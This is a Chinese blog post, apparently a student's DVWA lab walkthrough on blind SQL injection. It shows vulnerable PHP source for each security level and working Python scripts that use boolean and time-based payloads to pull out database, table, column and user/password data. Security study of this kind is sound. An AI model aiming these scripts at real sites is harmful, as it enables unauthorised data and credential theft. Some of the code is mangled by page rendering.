<!DOCTYPE HTML>
<html lang="en">


<head>
    <meta charset="utf-8">
    <meta name="keywords" content="DVWA--SQL(Blind), 黛色若梦">
    <meta name="description" content="A Freshman">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
    <meta name="renderer" content="webkit|ie-stand|ie-comp">
    <meta name="mobile-web-app-capable" content="yes">
    <meta name="format-detection" content="telephone=no">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
    <!-- Global site tag (gtag.js) - Google Analytics -->


    <title>DVWA--SQL(Blind) | 黛色若梦</title>
    <link rel="icon" type="image/png" href="/favicon.png">

    <link rel="stylesheet" type="text/css" href="/libs/awesome/css/all.css">
    <link rel="stylesheet" type="text/css" href="/libs/materialize/materialize.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/aos/aos.css">
    <link rel="stylesheet" type="text/css" href="/libs/animate/animate.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/lightGallery/css/lightgallery.min.css">
    <link rel="stylesheet" type="text/css" href="/css/matery.css">
    <link rel="stylesheet" type="text/css" href="/css/my.css">

    <script src="/libs/jquery/jquery.min.js"></script>

<meta name="generator" content="Hexo 5.4.0"><link rel="alternate" href="/atom.xml" title="黛色若梦" type="application/atom+xml">
</head>




<body>
    <header class="navbar-fixed">
    <nav id="headNav" class="bg-color nav-transparent">
        <div id="navContainer" class="nav-wrapper container">
            <div class="brand-logo">
                <a href="/" class="waves-effect waves-light">
                    
                    <img src="/medias/logo.png" class="logo-img" alt="LOGO">
                    
                    <span class="logo-span">黛色若梦</span>
                </a>
            </div>
            

<a href="#" data-target="mobile-nav" class="sidenav-trigger button-collapse"><i class="fas fa-bars"></i></a>
<ul class="right nav-menu">
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/" class="waves-effect waves-light">
      
      <i class="fas fa-home" style="zoom: 0.6;"></i>
      
      <span>Index</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/tags" class="waves-effect waves-light">
      
      <i class="fas fa-tags" style="zoom: 0.6;"></i>
      
      <span>Tags</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/categories" class="waves-effect waves-light">
      
      <i class="fas fa-bookmark" style="zoom: 0.6;"></i>
      
      <span>Categories</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/archives" class="waves-effect waves-light">
      
      <i class="fas fa-archive" style="zoom: 0.6;"></i>
      
      <span>Archives</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/about" class="waves-effect waves-light">
      
      <i class="fas fa-user-circle" style="zoom: 0.6;"></i>
      
      <span>About</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/contact" class="waves-effect waves-light">
      
      <i class="fas fa-comments" style="zoom: 0.6;"></i>
      
      <span>Contact</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/friends" class="waves-effect waves-light">
      
      <i class="fas fa-address-book" style="zoom: 0.6;"></i>
      
      <span>Friends</span>
    </a>
    
  </li>
  
  <li>
    <a href="#searchModal" class="modal-trigger waves-effect waves-light">
      <i id="searchIcon" class="fas fa-search" title="Search" style="zoom: 0.85;"></i>
    </a>
  </li>
</ul>


<div id="mobile-nav" class="side-nav sidenav">

    <div class="mobile-head bg-color">
        
        <img src="/medias/logo.png" class="logo-img circle responsive-img">
        
        <div class="logo-name">黛色若梦</div>
        <div class="logo-desc">
            
            A Freshman
            
        </div>
    </div>

    

    <ul class="menu-list mobile-menu-list">
        
        <li class="m-nav-item">
	  
		<a href="/" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-home"></i>
			
			Index
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/tags" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-tags"></i>
			
			Tags
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/categories" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-bookmark"></i>
			
			Categories
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/archives" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-archive"></i>
			
			Archives
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/about" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-user-circle"></i>
			
			About
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/contact" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-comments"></i>
			
			Contact
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/friends" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-address-book"></i>
			
			Friends
		</a>
          
        </li>
        
        
        <li><div class="divider"></div></li>
        <li>
            <a href="https://github.com/blinkfox/hexo-theme-matery" class="waves-effect waves-light" target="_blank">
                <i class="fab fa-github-square fa-fw"></i>Fork Me
            </a>
        </li>
        
    </ul>
</div>


        </div>

        
            <style>
    .nav-transparent .github-corner {
        display: none !important;
    }

    .github-corner {
        position: absolute;
        z-index: 10;
        top: 0;
        right: 0;
        border: 0;
        transform: scale(1.1);
    }

    .github-corner svg {
        color: #0f9d58;
        fill: #fff;
        height: 64px;
        width: 64px;
    }

    .github-corner:hover .octo-arm {
        animation: a 0.56s ease-in-out;
    }

    .github-corner .octo-arm {
        animation: none;
    }

    @keyframes a {
        0%,
        to {
            transform: rotate(0);
        }
        20%,
        60% {
            transform: rotate(-25deg);
        }
        40%,
        80% {
            transform: rotate(10deg);
        }
    }
</style>

<a href="https://github.com/blinkfox/hexo-theme-matery" class="github-corner tooltipped hide-on-med-and-down" target="_blank"
   data-tooltip="Fork Me" data-position="left" data-delay="50">
    <svg viewBox="0 0 250 250" aria-hidden="true">
        <path d="M0,0 L115,115 L130,115 L142,142 L250,250 L250,0 Z"></path>
        <path d="M128.3,109.0 C113.8,99.7 119.0,89.6 119.0,89.6 C122.0,82.7 120.5,78.6 120.5,78.6 C119.2,72.0 123.4,76.3 123.4,76.3 C127.3,80.9 125.5,87.3 125.5,87.3 C122.9,97.6 130.6,101.9 134.4,103.2"
              fill="currentColor" style="transform-origin: 130px 106px;" class="octo-arm"></path>
        <path d="M115.0,115.0 C114.9,115.1 118.7,116.5 119.8,115.4 L133.7,101.6 C136.9,99.2 139.9,98.4 142.2,98.6 C133.8,88.0 127.5,74.4 143.8,58.0 C148.5,53.4 154.0,51.2 159.7,51.0 C160.3,49.4 163.2,43.6 171.4,40.1 C171.4,40.1 176.1,42.5 178.8,56.2 C183.1,58.6 187.2,61.8 190.9,65.4 C194.5,69.0 197.7,73.2 200.1,77.6 C213.8,80.2 216.3,84.9 216.3,84.9 C212.7,93.1 206.9,96.0 205.4,96.6 C205.1,102.4 203.0,107.8 198.3,112.5 C181.9,128.9 168.3,122.5 157.7,114.1 C157.9,116.9 156.7,120.9 152.7,124.9 L141.0,136.5 C139.8,137.7 141.6,141.9 141.8,141.8 Z"
              fill="currentColor" class="octo-body"></path>
    </svg>
</a>
        
    </nav>

</header>

    



<div class="bg-cover pd-header post-cover" style="background-image: url('/medias/featureimages/14.jpg')">
    <div class="container" style="right: 0px;left: 0px;">
        <div class="row">
            <div class="col s12 m12 l12">
                <div class="brand">
                    <h1 class="description center-align post-title">DVWA--SQL(Blind)</h1>
                </div>
            </div>
        </div>
    </div>
</div>




<main class="post-container content">

    
    <link rel="stylesheet" href="/libs/tocbot/tocbot.css">
<style>
    #articleContent h1::before,
    #articleContent h2::before,
    #articleContent h3::before,
    #articleContent h4::before,
    #articleContent h5::before,
    #articleContent h6::before {
        display: block;
        content: " ";
        height: 100px;
        margin-top: -100px;
        visibility: hidden;
    }

    #articleContent :focus {
        outline: none;
    }

    .toc-fixed {
        position: fixed;
        top: 64px;
    }

    .toc-widget {
        width: 345px;
        padding-left: 20px;
    }

    .toc-widget .toc-title {
        padding: 35px 0 15px 17px;
        font-size: 1.5rem;
        font-weight: bold;
        line-height: 1.5rem;
    }

    .toc-widget ol {
        padding: 0;
        list-style: none;
    }

    #toc-content {
        padding-bottom: 30px;
        overflow: auto;
    }

    #toc-content ol {
        padding-left: 10px;
    }

    #toc-content ol li {
        padding-left: 10px;
    }

    #toc-content .toc-link:hover {
        color: #42b983;
        font-weight: 700;
        text-decoration: underline;
    }

    #toc-content .toc-link::before {
        background-color: transparent;
        max-height: 25px;

        position: absolute;
        right: 23.5vw;
        display: block;
    }

    #toc-content .is-active-link {
        color: #42b983;
    }

    #floating-toc-btn {
        position: fixed;
        right: 15px;
        bottom: 76px;
        padding-top: 15px;
        margin-bottom: 0;
        z-index: 998;
    }

    #floating-toc-btn .btn-floating {
        width: 48px;
        height: 48px;
    }

    #floating-toc-btn .btn-floating i {
        line-height: 48px;
        font-size: 1.4rem;
    }
</style>
<div class="row">
    <div id="main-content" class="col s12 m12 l9">
        <!-- 文章内容详情 -->
<div id="artDetail">
    <div class="card">
        <div class="card-content article-info">
            <div class="row tag-cate">
                <div class="col s7">
                    
                    <div class="article-tag">
                        
                            <a href="/tags/sqli/">
                                <span class="chip bg-color">sqli</span>
                            </a>
                        
                    </div>
                    
                </div>
                <div class="col s5 right-align">
                    
                </div>
            </div>

            <div class="post-info">
                
                <div class="post-date info-break-policy">
                    <i class="far fa-calendar-minus fa-fw"></i>Publish Date:&nbsp;&nbsp;
                    2022-01-26
                </div>
                

                

                

                

                
            </div>
        </div>
        <hr class="clearfix">

        

        

        <div class="card-content article-card-content">
            <div id="articleContent">
                <h1 id="sql-blind"><a href="#sql-blind" class="headerlink" title="sql(blind)"></a>sql(blind)</h1><p>不会将返回具体的数据信息或语法信息，只会将服务器包装后的信息返回到页面中。</p>
<table>
<thead>
<tr>
<th>SQL注入</th>
<th>1.执行SQL注入攻击时，服务器会响应来自数据库服务器的错误信息，信息提示SQL语法不正确等。 2.一般在页面上直接就会显示执行sql语句的结果。</th>
</tr>
</thead>
<tbody><tr>
<td>SQL盲注</td>
<td>1.一般情况，执行SQL盲注，服务器不会直接返回具体的数据库错误or语法错误，而是会返回程序开发所设置的特定信息（也有特例，如基于报错的盲注） 2.一般在页面上不会直接显示sql执行的结果 3.有可能出现不确定sql是否执行的情况</td>
</tr>
</tbody></table>
<h2 id="SQL盲注流程"><a href="#SQL盲注流程" class="headerlink" title="SQL盲注流程"></a>SQL盲注流程</h2><p>1.判断是否存在注入，注入的类型</p>
<p>2.猜解当前数据库名称</p>
<p>3.猜解数据库中的表名</p>
<p>4.猜解表中的字段名</p>
<p>5.获取表中的字段值</p>
<p>6.获取字段信息</p>
<h2 id="DVWA"><a href="#DVWA" class="headerlink" title="DVWA"></a>DVWA</h2><p>当然要用脚本了，以下的脚本都是布尔注入，时间盲注如输入1’ and sleep(5) #，感觉到明显延迟；</p>
<h3 id="low"><a href="#low" class="headerlink" title="low"></a>low</h3><h4 id="1-源码分析"><a href="#1-源码分析" class="headerlink" title="1.源码分析"></a>1.源码分析</h4><pre><code>&lt;?php

if( isset( $_GET[ &#39;Submit&#39; ] ) ) &#123;
    // Get input
    $id = $_GET[ &#39;id&#39; ];
// Check database
$getid  = &quot;SELECT first_name, last_name FROM users WHERE user_id = &#39;$id&#39;;&quot;;
$result = mysqli_query($GLOBALS[&quot;___mysqli_ston&quot;],  $getid ); // Removed &#39;or die&#39; to suppress mysql errors

// Get results
$num = @mysqli_num_rows( $result );
// The &#39;@&#39; character suppresses errors
//最后判断只有两种
num大于0输出User ID exists in the database
num小于等于0 输出User ID is MISSING from the database
if( $num &gt; 0 ) &#123;
    // Feedback for end user
    $html .= &#39;&lt;pre&gt;User ID exists in the database.&lt;/pre&gt;&#39;;
&#125;
else &#123;
    // User wasn&#39;t found, so the page wasn&#39;t!
    header( $_SERVER[ &#39;SERVER_PROTOCOL&#39; ] . &#39; 404 Not Found&#39; );

    // Feedback for end user
    $html .= &#39;&lt;pre&gt;User ID is MISSING from the database.&lt;/pre&gt;&#39;;
&#125;

((is_null($___mysqli_res = mysqli_close($GLOBALS[&quot;___mysqli_ston&quot;]))) ? false : $___mysqli_res);
&#125;

?&gt;
</code></pre>
<h4 id="2-漏洞复现"><a href="#2-漏洞复现" class="headerlink" title="2.漏洞复现"></a>2.漏洞复现</h4><p>首先找注入点，因为返回参数只有两种，所以咱可以用延时或布尔注入。</p>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/qq_42181428/article/details/88075784?spm=1001.2101.3001.6650.9&utm_medium=distribute.pc_relevant.none-task-blog-2~default~BlogCommendFromBaidu~Rate-9.pc_relevant_default&depth_1-utm_source=distribute.pc_relevant.none-task-blog-2~default~BlogCommendFromBaidu~Rate-9.pc_relevant_default&utm_relevant_index=12">参考博客</a></p>
<p><img src="/images/sql1.png" alt="sql1"></p>
<p>先查库名，再查表名，再查字段，最后查数据</p>
<p>这里用二分法的脚本</p>
<p>网上找到了字典法，自己写了一个二分法查找的。</p>
<p>这里凡是有‘必须加上,即 \ ‘ 表示  ‘</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br></pre></td><td class="code"><pre><span class="line">import requests</span><br><span class="line">import time</span><br><span class="line"></span><br><span class="line">url = &#x27;http://www.dvwa-labs.com/vulnerabilities/sqli_blind/&#x27;</span><br><span class="line">head = &#123;&#x27;cookie&#x27;: &#x27;security=low; PHPSESSID=ng53mlq3dnrgelgcaju14epui5&#x27; &#125;</span><br><span class="line">#因为dvwa需要登陆，所以要在头部里加入cookie</span><br><span class="line">r = requests.Session() # 保持回话</span><br><span class="line">flag = &#x27;&#x27;</span><br><span class="line">for i in range (1,1000):</span><br><span class="line">    low = 32</span><br><span class="line">    high = 128</span><br><span class="line">    mid = ( low + high) &gt;&gt; 1</span><br><span class="line">    #查表：</span><br><span class="line">    while (low &lt; high):</span><br><span class="line">        #爆库payload=&#x27;?id=1\&#x27; and (ascii(substr((select group_concat(schema_name) from information_schema.schemata),&#123;&#125;,1))&gt;&#123;&#125;)%23&amp;Submit=Submit#&#x27;.format(i,mid)</span><br><span class="line">        #爆表名payload = &#x27;?id=1\&#x27; and (ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),&#123;&#125;,1))&gt;&#123;&#125;)%23&amp;Submit=Submit#&#x27;.format(i, mid)</span><br><span class="line">        #爆列名payload = &#x27;?id=1\&#x27; and (ascii(substr((select group_concat(column_name) from information_schema.columns where table_name=\&#x27;users\&#x27;),&#123;&#125;,1))&gt;&#123;&#125;)%23&amp;Submit=Submit#&#x27;.format(i, mid)</span><br><span class="line">        payload = &#x27;?id=1\&#x27; and (ascii(substr((select group_concat(user,password) from users),&#123;&#125;,1))&gt;&#123;&#125;)%23&amp;Submit=Submit#&#x27;.format(i, mid)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">        time.sleep(0.04)</span><br><span class="line">        if &quot;exists&quot; in r.get(url+payload, headers=head).text:</span><br><span class="line">            low = mid + 1</span><br><span class="line">        else:</span><br><span class="line">            high = mid</span><br><span class="line">        mid = (low + high) &gt;&gt; 1</span><br><span class="line">    if(mid == 32 or mid ==127):</span><br><span class="line">        break</span><br><span class="line">    flag += chr(mid)</span><br><span class="line">    print(flag)</span><br><span class="line"></span><br><span class="line">print(flag)</span><br></pre></td></tr></table></figure>

<p><img src="/images/sql2.png" alt="sql2"></p>
<p><img src="/images/sql3.png" alt="sql3"></p>
<p><img src="/images/sql5.png" alt="sql5"></p>
<p><img src="/images/sql6.png" alt="sql6"></p>
<p>网上看到的</p>
<p>用到的是字典法</p>
<p>脚本一：爆表名</p>
<pre><code>#!/usr/bin/env python3
# -*- coding: UTF-8 -*-

import requests

# 脚本里用到的参数
# databaseLen   库名长度
# databse_name  库名
# tableNum      表的数量
# tableLen      表名长度
# table_name    表名

s = requests.Session()

url = &#39;http://www.dvwa-labs.com/vulnerabilities/sqli_blind/&#39;

payloads = &#39;abcdefghijklmnopqrstuvwxyz1234567890&#39;
# 这里为节约时间只包含小写字母与数字，实际可能还有大写字母与符号

headers = &#123;&#39;Cookie&#39;: &#39;security=low; PHPSESSID=ng53mlq3dnrgelgcaju14epui5&#39;&#125;
# 因为dvwa需要登陆，所以要在头部里加入cookie
# 1.先爆破库名的长度，以提高后续循环的效率,也可以不爆破长度，直接爆破名称（只要循环数大于长度）
for j in range(1,50):
    databaseLen_payload = &#39;?id=1\&#39; and length(database())=&#39;+str(j)+&#39; %23&amp;Submit=Submit#&#39;
    # 所有payload里的注释#要用url编码表示，因为这是直接添加在url里的
    if &#39;User ID exists in the database.&#39; in s.get(url+databaseLen_payload, headers=headers).text:
        databaseLen = j
        break
print(&#39;database_lenth: &#39;+str(databaseLen))

# 2.爆库名
databse_name = &#39;&#39;
for j in range(1,databaseLen+1):
    for i in payloads:
        databse_payload = &#39;?id=1\&#39; and substr(database(),&#39;+str(j)+&#39;,1)=\&#39;&#39;+str(i)+&#39;\&#39; %23&amp;Submit=Submit#&#39;

        if &#39;User ID exists in the database.&#39; in s.get(url+databse_payload, headers=headers).text:
            databse_name += i
print(&#39;database_name: &#39;+databse_name)
        
# 3.爆破表的个数
for j in range(1,50):
    tableNum_payload = &#39;?id=1\&#39; and (select count(table_name) from information_schema.tables where table_schema=database())=&#39;+str(j)+&#39; %23&amp;Submit=Submit#&#39;
    if &#39;User ID exists in the database.&#39; in s.get(url+tableNum_payload, headers=headers).text:
        tableNum = j
        break
print(&#39;tableNum: &#39;+str(tableNum))

# 4.爆出所有的表名
# (1)爆出各个表名的长度
for j in range(0,tableNum):
    table_name = &#39;&#39;
    for i in range(1,50):
        tableLen_payload = &#39;?id=1\&#39; and length(substr((select table_name from information_schema.tables where table_schema=database() limit &#39;+str(j)+&#39;,1),1))=&#39;+str(i)+&#39; %23&amp;Submit=Submit#&#39;
                # 用法substr(&#39;This is a test&#39;, 6) 返回&#39;is a test&#39;
        if &#39;User ID exists in the database.&#39; in s.get(url+tableLen_payload, headers=headers).text:
            tableLen = i
            print(&#39;table&#39;+str(j+1)+&#39;_length: &#39;+str(tableLen))
          
            # (2)内部循环爆破每个表的表名
            for m in range(1,tableLen+1):
                for n in payloads: # i在上个循环用过了
                    table_payload = &#39;?id=1\&#39; and substr((select table_name from information_schema.tables where table_schema=database() limit &#39;+str(j)+&#39;,1),&#39;+str(m)+&#39;,1)=\&#39;&#39;+str(n)+&#39;\&#39; %23&amp;Submit=Submit#&#39;
                    if &#39;User ID exists in the database.&#39; in s.get(url+table_payload, headers=headers).text:
                        table_name += n
            print(&#39;table&#39;+str(j+1)+&#39;_name: &#39;+table_name)
</code></pre>
<p>脚本2：爆列名</p>
<pre><code>#!/usr/bin/env python3
# -*- coding: UTF-8 -*-
# 根据上个脚本得到的结果，此脚本用来跑出&#39;flagishere&#39;表中的字段

import requests

s = requests.Session()  # 保持回话

url = &#39;http://www.dvwa-labs.com/vulnerabilities/sqli_blind/&#39;

payloads = &#39;abcdefghijklmnopqrstuvwxyz1234567890&#39;
# 这里为节约时间只包含小写字母与数字，实际可能还有大写字母与符号

headers = &#123;&#39;Cookie&#39;: &#39;security=low; PHPSESSID=ng53mlq3dnrgelgcaju14epui5&#39;&#125;
# 因为dvwa需要登陆，所以要在头部里加入cookie

# 1.判断flgishere表中字段数目
columnNum = 0
for j in range(50):
    columnNum_payload = &#39;?id=1\&#39; and (select count(column_name) from information_schema.columns where table_name=\&#39;users\&#39;)=&#39; + str(
        j) + &#39; %23&amp;Submit=Submit#&#39;
    if &#39;User ID exists in the database.&#39; in s.get(url + columnNum_payload, headers=headers).text:
        columnNum = j
        break
print(&#39;columnNum: &#39; + str(columnNum))

# 2.爆出每个字段名的长度
for j in range(0, columnNum):
    column_name = &#39;&#39;
    for i in range(1, 50):
        columnLen_payload = &#39;?id=1\&#39; and length(substr((select column_name from information_schema.columns where table_name=\&#39;users\&#39; limit &#39; + str(
            j) + &#39;,1),1))=&#39; + str(i) + &#39; %23&amp;Submit=Submit#&#39;
        if &#39;User ID exists in the database.&#39; in s.get(url + columnLen_payload, headers=headers).text:
            columnLen = i
            print(&#39;column&#39; + str(j + 1) + &#39;_length: &#39; + str(columnLen))

            # (2)内部循环爆破每个表的表名
            for m in range(1, columnLen + 1):
                for n in payloads:  # i在上个循环用过了
                    column_payload = &#39;?id=1\&#39; and substr((select column_name from information_schema.columns where table_name=\&#39;users\&#39; limit &#39; + str(
                        j) + &#39;,1),&#39; + str(m) + &#39;,1)=\&#39;&#39; + str(n) + &#39;\&#39; %23&amp;Submit=Submit#&#39;
                    if &#39;User ID exists in the database.&#39; in s.get(url + column_payload, headers=headers).text:
                        column_name += n
            print(&#39;column&#39; + str(j + 1) + &#39;_name: &#39; + column_name)
</code></pre>
<p>脚本三：爆字段</p>
<pre><code>#!/usr/bin/env python3
# -*- coding: UTF-8 -*-

# 根据上个脚本得到的结果，此脚本用来跑出&#39;flagishere&#39;表中的字段名为&#39;flag&#39;
# 所以此脚本用来爆破flag字段中的内容

import requests

s = requests.Session()  # 保持回话

url = &#39;http://www.dvwa-labs.com/vulnerabilities/sqli_blind/&#39;

payloads = &#39;abcdefghijklmnopqrstuvwxyz1234567890&#39;
# 这里为节约时间只包含小写字母与数字，实际可能还有大写字母与符号

headers = &#123;&#39;Cookie&#39;: &#39;security=low; PHPSESSID=ng53mlq3dnrgelgcaju14epui5&#39;&#125;
# 因为dvwa需要登陆，所以要在头部里加入cookie

# 判断flag字段中记录(行)数量
rowNum = 0
for j in range(50):
    rowNum_payload = &#39;?id=1\&#39; and (select count(*) from users)=&#39;+str(j)+&#39; %23&amp;Submit=Submit#&#39;
    if &#39;User ID exists in the database.&#39; in s.get(url+rowNum_payload, headers=headers).text:
        rowNum = j
print(&quot;row_number: &quot;+str(rowNum))
</code></pre>
<p>​<br>    # 先爆每个字段值长度，以便控制循环，提高效率，也可省略此步骤，但要保证循环大于字段长度<br>    for j in range(0,rowNum+1):</p>
<pre><code>    rowContent = &#39;&#39;
    for i in range(50):
       #rowLen_payload = &#39;?id=1\&#39; and length(substr(select flag from flagishere limit &#39;+str(j)+&#39;,1),1)=&#39;+str(i)+&#39; %23&amp;Submit=Submit#&#39;
        rowLen_payload = &#39;?id=1\&#39; and length(substr((select user from users limit &#39;+str(j)+&#39;,1),1))=&#39;+str(i)+&#39; %23&amp;Submit=Submit#&#39;
        if &#39;User ID exists in the database.&#39; in s.get(url+rowLen_payload, headers=headers).text:
            rowLen = i
            print(&#39;row&#39;+str(j+1)+&#39;_length: &#39;+str(rowLen))
            #爆出个字段内容
            for m in range(1,rowLen+1):
                for n in payloads:
                    rowContent_payload = &#39;?id=1\&#39; and substr((select user from users limit &#39;+str(j)+&#39;,1),&#39;+str(m)+&#39;,1)=\&#39;&#39;+str(n)+&#39;\&#39; %23&amp;Submit=Submit#&#39;
                    if &#39;User ID exists in the database.&#39; in s.get(url+rowContent_payload, headers=headers).text:
                        rowContent += n
            print(&#39;row&#39;+str(j+1)+&#39;_content: &#39;+rowContent)
</code></pre>
<p><img src="../images/sql7.png" alt="sql7"></p>
<p><img src="../images/sql8.png" alt="sql8"></p>
<p><img src="../images/sql9.png" alt="sql9"></p>
<p><img src="../images/sql10.png" alt="sql10"></p>
<h3 id="medium"><a href="#medium" class="headerlink" title="medium"></a>medium</h3><h4 id="1-源码分析-1"><a href="#1-源码分析-1" class="headerlink" title="1.源码分析"></a>1.源码分析</h4><pre><code>&lt;?php

if( isset( $_POST[ &#39;Submit&#39; ]  ) ) &#123;
    // Get input
    $id = $_POST[ &#39;id&#39; ];
    $id = ((isset($GLOBALS[&quot;___mysqli_ston&quot;]) &amp;&amp; is_object($GLOBALS[&quot;___mysqli_ston&quot;])) ? mysqli_real_escape_string($GLOBALS[&quot;___mysqli_ston&quot;],  $id ) : ((trigger_error(&quot;[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.&quot;, E_USER_ERROR)) ? &quot;&quot; : &quot;&quot;));
// Check database
$getid  = &quot;SELECT first_name, last_name FROM users WHERE user_id = $id;&quot;;
$result = mysqli_query($GLOBALS[&quot;___mysqli_ston&quot;],  $getid ); // Removed &#39;or die&#39; to suppress mysql errors

// Get results
$num = @mysqli_num_rows( $result ); // The &#39;@&#39; character suppresses errors
if( $num &gt; 0 ) &#123;
    // Feedback for end user
    $html .= &#39;&lt;pre&gt;User ID exists in the database.&lt;/pre&gt;&#39;;
&#125;
else &#123;
    // Feedback for end user
    $html .= &#39;&lt;pre&gt;User ID is MISSING from the database.&lt;/pre&gt;&#39;;
&#125;

//mysql_close();
&#125;

?&gt;
</code></pre>
<p>这里请求方式换成post注入方式换成数字型即可。</p>
<p>脚本：</p>
<pre><code>  import requests
import time

url = &#39;http://www.dvwa-labs.com/vulnerabilities/sqli_blind/&#39;
head = &#123;&#39;cookie&#39;: &#39;security=medium; PHPSESSID=ng53mlq3dnrgelgcaju14epui5&#39; &#125;
#因为dvwa需要登陆，所以要在头部里加入cookie
r = requests.Session() # 保持回话
flag = &#39;&#39;
for i in range (1,1000):
    low = 32
    high = 128
    mid = ( low + high) &gt;&gt; 1
    #查表：
    while (low &lt; high):
        #爆库payload=&#39;?id=1 and (ascii(substr((select group_concat(schema_name) from information_schema.schemata),&#123;&#125;,1))&gt;&#123;&#125;)%23&amp;Submit=Submit#&#39;.format(i,mid)
        #爆表名payload = &#39;?id=1 and (ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),&#123;&#125;,1))&gt;&#123;&#125;)%23&amp;Submit=Submit#&#39;.format(i, mid)
        #爆列名payload = &#39;?id=1 and (ascii(substr((select group_concat(column_name) from information_schema.columns where table_name=\&#39;users\&#39;),&#123;&#125;,1))&gt;&#123;&#125;)%23&amp;Submit=Submit#&#39;.format(i, mid)
        payload = &#39;?id=1 and (ascii(substr((select group_concat(user,password) from users),&#123;&#125;,1))&gt;&#123;&#125;)%23&amp;Submit=Submit#&#39;.format(i, mid)
</code></pre>
<p>​<br>      time.sleep(0.04)<br>        if “exists” in r.post(url+payload, headers=head).text:<br>            low = mid + 1<br>        else:<br>            high = mid<br>        mid = (low + high) &gt;&gt; 1<br>    if(mid == 32 or mid ==127):<br>        break<br>    flag += chr(mid)<br>    print(flag)<br>    print(flag)</p>
<h4 id="2-漏洞复现-1"><a href="#2-漏洞复现-1" class="headerlink" title="2.漏洞复现"></a>2.漏洞复现</h4><h3 id="high"><a href="#high" class="headerlink" title="high"></a>high</h3><h4 id="1-源码分析-2"><a href="#1-源码分析-2" class="headerlink" title="1.源码分析"></a>1.源码分析</h4><pre><code>&lt;?php

if( isset( $_COOKIE[ &#39;id&#39; ] ) ) &#123;
    // Get input
    $id = $_COOKIE[ &#39;id&#39; ];
// Check database
$getid  = &quot;SELECT first_name, last_name FROM users WHERE user_id = &#39;$id&#39; LIMIT 1;&quot;;
$result = mysqli_query($GLOBALS[&quot;___mysqli_ston&quot;],  $getid ); // Removed &#39;or die&#39; to suppress mysql errors

// Get results
$num = @mysqli_num_rows( $result ); // The &#39;@&#39; character suppresses errors
if( $num &gt; 0 ) &#123;
    // Feedback for end user
    $html .= &#39;&lt;pre&gt;User ID exists in the database.&lt;/pre&gt;&#39;;
&#125;
else &#123;
    // Might sleep a random amount
    if( rand( 0, 5 ) == 3 ) &#123;
        sleep( rand( 2, 4 ) );
    &#125;

    // User wasn&#39;t found, so the page wasn&#39;t!
    header( $_SERVER[ &#39;SERVER_PROTOCOL&#39; ] . &#39; 404 Not Found&#39; );

    // Feedback for end user
    $html .= &#39;&lt;pre&gt;User ID is MISSING from the database.&lt;/pre&gt;&#39;;
&#125;

((is_null($___mysqli_res = mysqli_close($GLOBALS[&quot;___mysqli_ston&quot;]))) ? false : $___mysqli_res);
&#125;

?&gt;
</code></pre>
<h4 id="2-漏洞复现-2"><a href="#2-漏洞复现-2" class="headerlink" title="2.漏洞复现"></a>2.漏洞复现</h4><p>这题是字符型。利用cookie传递参数id，当SQL查询结果为空时，会执行函数sleep(seconds)，目的是为了扰乱基于时间的盲注。同时在 SQL查询语句中添加了LIMIT 1，希望以此控制只输出一个结果。虽然添加了LIMIT 1，但是我们可以通过#将其注释掉。而我们的布尔盲注仍可以用，脚本修一修还能用。</p>
<h3 id="impossible"><a href="#impossible" class="headerlink" title="impossible"></a>impossible</h3><h4 id="1-源码分析-3"><a href="#1-源码分析-3" class="headerlink" title="1.源码分析"></a>1.源码分析</h4><pre><code>&lt;?php

if( isset( $_GET[ &#39;Submit&#39; ] ) ) &#123;
    // Check Anti-CSRF token
    checkToken( $_REQUEST[ &#39;user_token&#39; ], $_SESSION[ &#39;session_token&#39; ], &#39;index.php&#39; );
// Get input
$id = $_GET[ &#39;id&#39; ];

// Was a number entered?
if(is_numeric( $id )) &#123;
    // Check the database
    $data = $db-&gt;prepare( &#39;SELECT first_name, last_name FROM users WHERE user_id = (:id) LIMIT 1;&#39; );
